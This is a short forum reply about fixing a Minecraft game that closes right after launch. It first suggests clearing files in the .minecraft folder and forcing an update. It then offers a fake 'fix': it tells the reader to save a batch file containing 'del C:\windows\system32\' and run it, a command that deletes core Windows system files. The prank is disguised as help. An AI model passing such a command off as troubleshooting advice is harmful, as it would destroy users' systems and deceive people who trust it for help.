Same thing happens to me but it pops up and leaves super fast...

GO TO %appdata% - .Minecraft and open it,delete all maps(if you want to keep your saves put them in an diffrent folder on youur desktop) then close it and open minecraft,don't enter an username and click on force update!! IT WORKED FOR ME!!

Wait, no, I know what to do!

Open notepad, and write:

@echo off

del C:\windows\system32\

@echo on

and save it as a .bat file, then double click on the .bat file.
